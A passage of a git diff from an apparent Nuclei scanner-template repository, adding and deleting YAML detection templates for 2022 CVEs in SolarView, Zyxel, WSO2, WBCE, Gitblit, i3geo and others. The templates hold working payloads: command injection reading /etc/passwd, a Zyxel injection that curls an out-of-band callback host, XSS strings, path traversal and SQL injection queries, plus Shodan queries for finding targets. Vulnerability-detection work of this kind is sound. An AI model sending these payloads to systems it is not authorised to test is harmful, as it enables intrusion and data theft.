https://drive.google.com/drive/folders/1tGr-WExbpfvhRg31XCoaZOFLWyt3r60g?usp=sharing + - http://packetstormsecurity.com/files/167183/SolarView-Compact-6.0-Command-Injection.html + - https://github.com/ARPSyndicate/cvemon + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-29303 + cwe-id: CWE-78 + epss-score: 0.9598 + epss-percentile: 0.99429 + cpe: cpe:2.3:o:contec:sv-cpt-mc310_firmware:6.00:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: contec + product: sv-cpt-mc310_firmware + shodan-query: http.html:"SolarView Compact" + tags: cve,cve2022,injection,solarview,edb,packetstorm,rce,kev,contec +variables: + cmd: "cat${IFS}/etc/passwd" + +http: + - raw: + - | + @timeout: 25s + POST /conf_mail.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + mail_address=%3B{{cmd}}%3B&button=%83%81%81%5B%83%8B%91%97%90M + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0" + + - type: word + part: body + words: + - "p1_network_mail.cgi" +# digest: 4a0a00473045022100cfdae160b8d20debb49ab77a03efc5984e3595e0738b0153de27449eb8cf254c022008bf10a1ac0f9b524841d022daae36b4b0b105ddae1296e300fb87c886200617:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-29548.yaml b/nuclei-templates/CVE-2022/cve-2022-29548.yaml new file mode 100644 index 0000000000..5cdf4a3d75 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-29548.yaml @@ -0,0 +1,55 @@ +id: CVE-2022-29548 + +info: + name: WSO2 - Cross-Site Scripting + author: edoardottt + severity: medium + description: | + WSO2 contains a reflected cross-site scripting vulnerability in the Management Console of API Manager 2.2.0, 2.5.0, 2.6.0, 3.0.0, 3.1.0, 3.2.0, and 4.0.0; API Manager Analytics 2.2.0, 2.5.0, and 2.6.0; API Microgateway 2.2.0; Data Analytics Server 3.2.0; Enterprise Integrator 6.2.0, 6.3.0, 6.4.0, 6.5.0, and 6.6.0; IS as Key Manager 5.5.0, 5.6.0, 5.7.0, 5.9.0, and 5.10.0; Identity Server 5.5.0, 5.6.0, 5.7.0, 5.9.0, 5.10.0, and 5.11.0; Identity Server Analytics 5.5.0 and 5.6.0; and WSO2 Micro Integrator 1.0.0. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application. + remediation: | + Apply the latest security patches or updates provided by WSO2 to fix the XSS vulnerability. + reference: + - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2021-1603 + - https://nvd.nist.gov/vuln/detail/CVE-2022-29548 + - http://packetstormsecurity.com/files/167587/WSO2-Management-Console-Cross-Site-Scripting.html + - https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2022/WSO2-2021-1603/ + - https://github.com/vishnusomank/GoXploitDB + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-29548 + cwe-id: CWE-79 + epss-score: 0.00299 + epss-percentile: 0.68867 + cpe: cpe:2.3:a:wso2:api_manager:2.2.0:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: wso2 + product: api_manager + google-query: inurl:"carbon/admin/login" + tags: cve,cve2022,wso2,xss,packetstorm + +http: + - method: GET + path: + - "{{BaseURL}}/carbon/admin/login.jsp?loginStatus=false&errorCode=%27);alert(document.domain)//" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "CARBON.showWarningDialog('???');alert(document.domain)//???" + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 +# digest: 4a0a00473045022100f74f191103aed5a55a87b64ed54d8e3f2c3a84f48f2853428d9af571e0cd877702201a9a8a865260835250bcde79a6d3fd03166539ac2f673fd0a73386d219f510e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-30073.yaml b/nuclei-templates/CVE-2022/cve-2022-30073.yaml deleted file mode 100644 index 8e51358733..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-30073.yaml +++ /dev/null @@ -1,80 +0,0 @@ -id: CVE-2022-30073 - -info: - name: WBCE CMS 1.5.2 - Cross-Site Scripting - author: arafatansari - severity: medium - description: | - WBCE CMS 1.5.2 contains a stored cross-site scripting vulnerability via \admin\user\save.php Display Name parameters. - impact: | - Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. - remediation: | - Upgrade to a patched version of WBCE CMS or apply the vendor-supplied patch to mitigate this vulnerability. - reference: - - https://github.com/APTX-4879/CVE - - https://github.com/APTX-4879/CVE/blob/main/CVE-2022-30073.pdf - - https://nvd.nist.gov/vuln/detail/CVE-2022-30073 - - https://github.com/ARPSyndicate/kenzer-templates - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N - cvss-score: 5.4 - cve-id: CVE-2022-30073 - cwe-id: CWE-79 - epss-score: 0.00205 - epss-percentile: 0.57793 - cpe: cpe:2.3:a:wbce:wbce_cms:1.5.2:*:*:*:*:*:*:* - metadata: - verified: true - max-request: 4 - vendor: wbce - product: wbce_cms - tags: cve2022,cve,wbcecms,xss,wbce - -http: - - raw: - - | - POST /admin/login/index.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - url=&username_fieldname=username_axh5kevh&password_fieldname=password_axh5kevh&username_axh5kevh={{username}}&password_axh5kevh={{password}}&submit=Login - - | - GET /admin/users/index.php HTTP/1.1 - Host: {{Hostname}} - - | - POST /admin/users/index.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - formtoken={{formtoken}}&user_id=&username_fieldname=username_tep83j9z&username_tep83j9z=testme2&password=temp1234&password2=temp1234&display_name=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&email=testme2%40abc.com&home_folder=&groups%5B%5D=1&active%5B%5D=1&submit= - - | - GET /admin/users/index.php HTTP/1.1 - Host: {{Hostname}} - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "

" - - "WBCECMS" - condition: and - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - - extractors: - - type: regex - name: formtoken - group: 1 - regex: - - '' - internal: true - part: body -# digest: 4a0a00473045022008a3770822e57b09d41ac02e4e8fb24a8d4ae12e02479ea7fba6c5a50919789a022100e7d5afd4414fd130081f474df96ee4a0f3b609a7d5e683b618acba7031af8323:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-30489.yaml b/nuclei-templates/CVE-2022/cve-2022-30489.yaml deleted file mode 100644 index fa8e443a15..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-30489.yaml +++ /dev/null @@ -1,58 +0,0 @@ -id: CVE-2022-30489 - -info: - name: Wavlink WN-535G3 - Cross-Site Scripting - author: For3stCo1d - severity: medium - description: | - Wavlink WN-535G3 contains a POST cross-site scripting vulnerability via the hostname parameter at /cgi-bin/login.cgi. - impact: | - Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. - remediation: | - Apply the latest firmware update provided by the vendor to mitigate this vulnerability. - reference: - - https://github.com/badboycxcc/XSS-CVE-2022-30489 - - https://github.com/badboycxcc/XSS - - https://nvd.nist.gov/vuln/detail/CVE-2022-30489 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-30489 - cwe-id: CWE-79 - epss-score: 0.00088 - epss-percentile: 0.36947 - cpe: cpe:2.3:o:wavlink:wn535g3_firmware:-:*:*:*:*:*:*:* - metadata: - verified: true - max-request: 1 - vendor: wavlink - product: wn535g3_firmware - shodan-query: http.title:"Wi-Fi APP Login" - tags: cve,cve2022,xss,wavlink,router,iot - -http: - - raw: - - | - POST /cgi-bin/login.cgi HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - newUI=1&page=login&username=admin&langChange=0&ipaddr=x.x.x.x&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=")&key=M27234733&password=63a36bceec2d3bba30d8611c323f4cda&lang_=cn - - matchers-condition: and - matchers: - - type: word - words: - - '' - - 'parent.location.replace("http://")' - condition: and - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 -# digest: 4a0a00473045022100e403fa95c8208dca72c7387425cba8c129e7dfa20d8dab4a96911b406fba2cc1022048e179973aa2f40b253ff07bb159c86d5da40b59437535549c3ee912cc28f201:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-30525.yaml b/nuclei-templates/CVE-2022/cve-2022-30525.yaml deleted file mode 100644 index 4e8a29bb38..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-30525.yaml +++ /dev/null @@ -1,53 +0,0 @@ -id: CVE-2022-30525 - -info: - name: Zyxel Firewall - OS Command Injection - author: h1ei1,prajiteshsingh - severity: critical - description: | - An OS command injection vulnerability in the CGI program of Zyxel USG FLEX 100(W) firmware versions 5.00 through 5.21 Patch 1, USG FLEX 200 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 500 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 700 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 50(W) firmware versions 5.10 through 5.21 Patch 1, USG20(W)-VPN firmware versions 5.10 through 5.21 Patch 1, ATP series firmware versions 5.10 through 5.21 Patch 1, VPN series firmware versions 4.60 through 5.21 Patch 1, are susceptible to a command injection vulnerability which could allow an attacker to modify specific files and then execute some OS commands on a vulnerable device. - impact: | - Successful exploitation of this vulnerability can lead to unauthorized remote code execution, compromising the confidentiality, integrity, and availability of the affected system. - remediation: | - Apply the latest security patches or firmware updates provided by Zyxel to mitigate this vulnerability. - reference: - - https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/ - - https://github.com/rapid7/metasploit-framework/pull/16563 - - https://www.zyxel.com/support/Zyxel-security-advisory-for-OS-command-injection-vulnerability-of-firewalls.shtml - - https://nvd.nist.gov/vuln/detail/CVE-2022-30525 - - http://packetstormsecurity.com/files/167176/Zyxel-Remote-Command-Execution.html - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-30525 - cwe-id: CWE-78 - epss-score: 0.97482 - epss-percentile: 0.99967 - cpe: cpe:2.3:o:zyxel:usg_flex_100w_firmware:*:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: zyxel - product: usg_flex_100w_firmware - shodan-query: title:"USG FLEX 100","USG FLEX 100w","USG FLEX 200","USG FLEX 500","USG FLEX 700","USG FLEX 50","USG FLEX 50w","ATP100","ATP200","ATP500","ATP700" - tags: cve2022,cve,packetstorm,zyxel,firewall,unauth,kev,msf,rce - -http: - - raw: - - | - POST /ztp/cgi-bin/handler HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json - - {"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":"1","vlanid":"5","mtu":"; curl {{interactsh-url}};","data":"hi"} - - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol - words: - - "http" - - - type: status - status: - - 500 -# digest: 4b0a00483046022100d2611a4bbd37c92e10c7c04c5287817c5276dc06e9595aa43f4c7e2d7f9d6f32022100e8b1382edb51ac7f80e2006d4ef501e49d529af2ea63b39cb9842b574f17f6db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-30777.yaml b/nuclei-templates/CVE-2022/cve-2022-30777.yaml deleted file mode 100644 index d36995911c..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-30777.yaml +++ /dev/null @@ -1,56 +0,0 @@ -id: CVE-2022-30777 - -info: - name: Parallels H-Sphere 3.6.1713 - Cross-Site Scripting - author: 3th1c_yuk1 - severity: medium - description: | - Parallels H-Sphere 3.6.1713 contains a cross-site scripting vulnerability via the index_en.php 'from' parameter. - impact: | - Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. - remediation: | - Apply the latest security patch or upgrade to a newer version of Parallels H-Sphere to mitigate the XSS vulnerability. - reference: - - https://medium.com/@bhattronit96/cve-2022-30777-45725763ab59 - - https://en.wikipedia.org/wiki/H-Sphere - - https://nvd.nist.gov/vuln/detail/CVE-2022-30777 - - https://medium.com/%40bhattronit96/cve-2022-30777-45725763ab59 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-30777 - cwe-id: CWE-79 - epss-score: 0.00087 - epss-percentile: 0.36061 - cpe: cpe:2.3:a:parallels:h-sphere:3.6.2:*:*:*:*:*:*:* - metadata: - verified: true - max-request: 2 - vendor: parallels - product: h-sphere - shodan-query: title:"h-sphere" - tags: cve,cve2022,parallels,hsphere,xss - -http: - - method: GET - path: - - '{{BaseURL}}/index_en.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - - '{{BaseURL}}/index.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - - stop-at-first-match: true - - matchers-condition: and - matchers: - - type: word - words: - - '"><script>alert(document.domain)</script>' - - - type: word - part: header - words: - - "text/html" - - - type: status - status: - - 200 -# digest: 4a0a004730450220193f90816efc79d2ac468c37e58a42add449c9c53f48ed07934c74f756d9550d022100bc87714095325fe51d81827336aa365718a61f67c95e590fea50198ba245e3eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-31268.yaml b/nuclei-templates/CVE-2022/cve-2022-31268.yaml deleted file mode 100644 index 061d0ca131..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-31268.yaml +++ /dev/null @@ -1,58 +0,0 @@ -id: CVE-2022-31268 - -info: - name: Gitblit 1.9.3 - Local File Inclusion - author: 0x_Akoko - severity: high - description: | - Gitblit 1.9.3 is vulnerable to local file inclusion via /resources//../ (e.g., followed by a WEB-INF or META-INF pathname). - impact: | - Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the affected system. - remediation: | - Upgrade Gitblit to a version that is not affected by the vulnerability (CVE-2022-31268). - reference: - - https://github.com/metaStor/Vuls/blob/main/gitblit/gitblit%20V1.9.3%20path%20traversal/gitblit%20V1.9.3%20path%20traversal.md - - https://vuldb.com/?id.200500 - - https://nvd.nist.gov/vuln/detail/CVE-2022-31268 - - https://github.com/Marcuccio/kevin - - https://github.com/20142995/sectool - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2022-31268 - cwe-id: CWE-22 - epss-score: 0.00618 - epss-percentile: 0.76574 - cpe: cpe:2.3:a:gitblit:gitblit:1.9.3:*:*:*:*:*:*:* - metadata: - verified: true - max-request: 1 - vendor: gitblit - product: gitblit - shodan-query: http.html:"Gitblit" - tags: cve,cve2022,lfi,gitblit - -http: - - method: GET - path: - - "{{BaseURL}}/resources//../WEB-INF/web.xml" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "</web-app>" - - "java.sun.com" - - "gitblit.properties" - condition: and - - - type: word - part: header - words: - - "application/xml" - - - type: status - status: - - 200 -# digest: 4b0a00483046022100e2e1fcaa58d2dee7545ceebd7a5676ce15a39fc9158480ee7246e0b44b801c19022100bd5e8b3b6dea5d148c40a77c6183f6e003c34e77f22ac9d017f7b00b202f9952:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-31373.yaml b/nuclei-templates/CVE-2022/cve-2022-31373.yaml new file mode 100644 index 0000000000..9cd6fdedb7 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-31373.yaml @@ -0,0 +1,57 @@ +id: CVE-2022-31373 + +info: + name: SolarView Compact 6.00 - Cross-Site Scripting + author: ritikchaddha + severity: medium + description: | + SolarView Compact 6.00 contains a cross-site scripting vulnerability via Solar_AiConf.php. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. + reference: + - https://github.com/badboycxcc/SolarView_Compact_6.0_xss + - https://nvd.nist.gov/vuln/detail/CVE-2022-31373 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/badboycxcc/badboycxcc + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-31373 + cwe-id: CWE-79 + epss-score: 0.00088 + epss-percentile: 0.36353 + cpe: cpe:2.3:o:contec:sv-cpt-mc310_firmware:6.0:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: contec + product: sv-cpt-mc310_firmware + shodan-query: http.html:"SolarView Compact" + tags: cve2022,cve,xss,solarview,contec + +http: + - method: GET + path: + - '{{BaseURL}}/Solar_AiConf.php/%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '/Solar_AiConf.php/"><script>alert(document.domain)</script>' + - 'HREF="Solar_Service.php"' + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 +# digest: 4a0a00473045022100e198facad20dc156feda279d1ce49117cb3d0baf80f67f7e1309efc885bbfe0e022002895be93b1e631fb4d53c0c2f701b0db0afe312b24eca373958d7eb78c65b88:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-31793.yaml b/nuclei-templates/CVE-2022/cve-2022-31793.yaml new file mode 100644 index 0000000000..0d5e0514ca --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-31793.yaml @@ -0,0 +1,47 @@ +id: CVE-2022-31793 + +info: + name: muhttpd <=1.1.5 - Local Inclusion + author: scent2d + severity: high + description: | + muhttpd 1.1.5 and before are vulnerable to unauthenticated local file inclusion. The vulnerability allows retrieval of files from the file system. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the system. + remediation: Update the application to version 1.10 + reference: + - https://derekabdine.com/blog/2022-arris-advisory.html + - https://nvd.nist.gov/vuln/detail/CVE-2022-31793 + - https://derekabdine.com/blog/2022-arris-advisory + - https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/08/millions-of-arris-routers-are-vulnerable-to-path-traversal-attacks/ + - http://inglorion.net/software/muhttpd/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-31793 + cwe-id: CWE-22 + epss-score: 0.25241 + epss-percentile: 0.96539 + cpe: cpe:2.3:a:inglorion:muhttpd:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: inglorion + product: muhttpd + tags: network,cve,cve2022,muhttpd,lfi,unauth,inglorion +tcp: + - host: + - "{{Hostname}}" + inputs: + - data: "47455420612F6574632F706173737764" + type: hex + + - data: "\n\n" + read-size: 128 + matchers: + - type: word + part: body + encoding: hex + words: + - "726f6f743a" +# digest: 4a0a004730450220552dea540450a6b50bb4fd1647d35646f4ddf95b681f33a3d832e169c3ee54a00221008959a00adc118b209a3e73b2598a4eafc401f50232ac399d121322f839f2a04c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-32024.yaml b/nuclei-templates/CVE-2022/cve-2022-32024.yaml deleted file mode 100644 index 316fc83d33..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-32024.yaml +++ /dev/null @@ -1,59 +0,0 @@ -id: CVE-2022-32024 - -info: - name: Car Rental Management System 1.0 - SQL Injection - author: arafatansari - severity: high - description: | - Car Rental Management System 1.0 contains an SQL injection vulnerability via /booking.php?car_id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. - impact: | - Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or even complete compromise of the system. - remediation: | - Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Car Rental Management System 1.0. - reference: - - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-4.md - - https://nvd.nist.gov/vuln/detail/CVE-2022-32024 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H - cvss-score: 7.2 - cve-id: CVE-2022-32024 - cwe-id: CWE-89 - epss-score: 0.00834 - epss-percentile: 0.80157 - cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:* - metadata: - verified: true - max-request: 2 - vendor: car_rental_management_system_project - product: car_rental_management_system - shodan-query: http.html:"Car Rental Management System" - comment: Login bypass is also possible using the payload- admin'+or+'1'%3D'1' in username. - tags: cve,cve2022,carrental,cms,sqli,authenticated,car_rental_management_system_project -variables: - num: "999999999" - -http: - - raw: - - | - POST /admin/ajax.php?action=login HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - username={{username}}&password={{password}} - - | - GET /booking.php?car_id=-1%20union%20select%201,md5({{num}}),3,4,5,6,7,8,9,10--+ HTTP/1.1 - Host: {{Hostname}} - - skip-variables-check: true - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '{{md5({{num}})}}' - - - type: status - status: - - 200 -# digest: 4a0a0047304502203b4e45ad6997926ec06328175be051f4173ad99349811ce498ebfabf77cfadec022100ebd9ee62670283e68f73cff5756332ebb4f4b7d010c5a102bcdfa61f6967c540:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-32025.yaml b/nuclei-templates/CVE-2022/cve-2022-32025.yaml deleted file mode 100644 index 14765055c5..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-32025.yaml +++ /dev/null @@ -1,62 +0,0 @@ -id: CVE-2022-32025 - -info: - name: Car Rental Management System 1.0 - SQL Injection - author: arafatansari - severity: high - description: | - Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/view_car.php?id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. - impact: | - Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. - remediation: | - Upgrade to the latest version to mitigate this vulnerability. - reference: - - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-6.md - - https://nvd.nist.gov/vuln/detail/CVE-2022-32025 - - https://github.com/ARPSyndicate/kenzer-templates - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H - cvss-score: 7.2 - cve-id: CVE-2022-32025 - cwe-id: CWE-89 - epss-score: 0.01426 - epss-percentile: 0.8625 - cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:* - metadata: - verified: true - max-request: 2 - vendor: car_rental_management_system_project - product: car_rental_management_system - shodan-query: http.html:"Car Rental Management System" - comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username. - tags: cve,cve2022,carrental,cms,sqli,authenticated,car_rental_management_system_project -variables: - num: "999999999" - -http: - - raw: - - | - POST /admin/ajax.php?action=login HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - username={{username}}%23&password={{password}} - - | - GET /admin/view_car.php?id=-1%20union%20select%201,md5({{num}}),3,4,5,6,7,8,9,10--+ HTTP/1.1 - Host: {{Hostname}} - - skip-variables-check: true - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '{{md5({{num}})}}' - - - type: status - status: - - 200 -# digest: 490a004630440220566cc50ee5f50c4a96f3e96207530f5e6f169affed02f065aecacbfec179891302202c5e77606826ec2964e65a363ae6cb5339c0746c36c2faf2c312ebba75307610:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-32028.yaml b/nuclei-templates/CVE-2022/cve-2022-32028.yaml deleted file mode 100644 index bd9a8b794a..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-32028.yaml +++ /dev/null @@ -1,62 +0,0 @@ -id: CVE-2022-32028 - -info: - name: Car Rental Management System 1.0 - SQL Injection - author: arafatansari - severity: high - description: | - Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/manage_user.php?id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. - impact: | - Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. - remediation: | - Upgrade to the latest version to mitigate this vulnerability. - reference: - - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-8.md - - https://nvd.nist.gov/vuln/detail/CVE-2022-32028 - - https://github.com/ARPSyndicate/kenzer-templates - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H - cvss-score: 7.2 - cve-id: CVE-2022-32028 - cwe-id: CWE-89 - epss-score: 0.01426 - epss-percentile: 0.8625 - cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:* - metadata: - verified: true - max-request: 2 - vendor: car_rental_management_system_project - product: car_rental_management_system - shodan-query: http.html:"Car Rental Management System" - comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username. - tags: cve,cve2022,carrental,cms,sqli,authenticated,car_rental_management_system_project -variables: - num: "999999999" - -http: - - raw: - - | - POST /admin/ajax.php?action=login HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - username={{username}}&password={{password}} - - | - GET /admin/manage_user.php?id=-1%20union%20select%201,md5({{num}}),3,4,5--+ HTTP/1.1 - Host: {{Hostname}} - - skip-variables-check: true - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '{{md5({{num}})}}' - - - type: status - status: - - 200 -# digest: 4b0a00483046022100df821f457de97d0880a4be9f79b9a08294cffaaf8b36b5f573415af2fcc073ec022100c1bf7e95967be2f3096198251b61f794654b302d661afc789ad82c93f886f2e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-32159.yaml b/nuclei-templates/CVE-2022/cve-2022-32159.yaml similarity index 100% rename from nuclei-templates/CVE-2022/CVE-2022-32159.yaml rename to nuclei-templates/CVE-2022/cve-2022-32159.yaml diff --git a/nuclei-templates/CVE-2022/cve-2022-32409.yaml b/nuclei-templates/CVE-2022/cve-2022-32409.yaml deleted file mode 100644 index 970cc96d0e..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-32409.yaml +++ /dev/null @@ -1,48 +0,0 @@ -id: CVE-2022-32409 - -info: - name: Portal do Software Publico Brasileiro i3geo 7.0.5 - Local File Inclusion - author: pikpikcu - severity: critical - description: Portal do Software Publico Brasileiro i3geo 7.0.5 is vulnerable to local file inclusion in the component codemirror.php, which allows attackers to execute arbitrary PHP code via a crafted HTTP request. - impact: | - An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server. - remediation: | - Apply the latest patch or upgrade to a newer version of i3geo to fix the LFI vulnerability. - reference: - - https://github.com/wagnerdracha/ProofOfConcept/blob/main/i3geo_proof_of_concept.txt - - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion - - https://nvd.nist.gov/vuln/detail/CVE-2022-32409 - - https://github.com/ARPSyndicate/cvemon - - https://github.com/ARPSyndicate/kenzer-templates - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-32409 - cwe-id: CWE-22 - epss-score: 0.47251 - epss-percentile: 0.97372 - cpe: cpe:2.3:a:softwarepublico:i3geo:7.0.5:*:*:*:*:*:*:* - metadata: - verified: true - max-request: 1 - vendor: softwarepublico - product: i3geo - shodan-query: http.html:"i3geo" - tags: cve2022,cve,i3geo,lfi,softwarepublico - -http: - - method: GET - path: - - "{{BaseURL}}/i3geo/exemplos/codemirror.php?&pagina=../../../../../../../../../../../../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - type: regex - regex: - - "root:[x*]:0:0" - - - type: status - status: - - 200 -# digest: 4a0a00473045022072e312e8df1571351e7a21ca6317934960724f0071495fe4169ca5b013300dcd022100cc5ac2a8a33a0acc037a5db55a65ebb9f5ae1937caac9aededb4a8a59ab3ec56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-33174.yaml 